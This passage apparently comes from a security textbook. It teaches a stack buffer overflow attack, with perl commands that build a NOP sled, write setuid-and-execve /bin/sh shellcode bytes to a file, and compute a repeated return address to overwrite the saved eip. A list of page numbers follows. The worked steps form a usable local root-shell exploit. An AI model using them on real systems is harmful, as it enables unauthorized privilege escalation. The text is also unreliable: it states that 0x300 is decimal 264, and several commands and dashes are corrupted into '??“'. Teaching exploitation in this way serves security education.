As a rule of thumb, it is a
good idea to fill half of the attack buffer with NOPs; in this case we will use 200 with the
following perl command:
perl -e 'print "90"x200';
A similar perl command will allow you to print your shellcode into a binary file as follows
(notice the use of the output redirector >):
$ perl -e 'print
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\
x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\
xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";' > sc
$
You can calculate the size of the shellcode with the following command:
$ wc ??“c sc
53 sc
Next we need to calculate our return address, which will be repeated until it overwrites
the saved eip on the stack. Recall that our current esp is 0xbffffbd8. When attacking from
the command line, it is important to remember that the command-line arguments will
be placed on the stack before the main function is called. Since our 408-byte attack
string will be placed on the stack as the second command-line argument, andwewant to
land somewhere in the NOP sled (the first half of the buffer), we will estimate a landing
spot by subtracting 0x300 (decimal 264) from the current esp as follows:
0xbffffbd8 ??“ 0x300 = 0xbffff8d8
Nowwe can use perl to write this address in little-endian format on the command line:
perl -e 'print"\xd8\xf8\xff\xbf"x38';
The number 38 was calculated in our case with some simple modulo math:
(408 bytes-200 bytes of NOP ??“ 53 bytes of Shellcode) / 4 bytes of address = 38.
Pages:
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329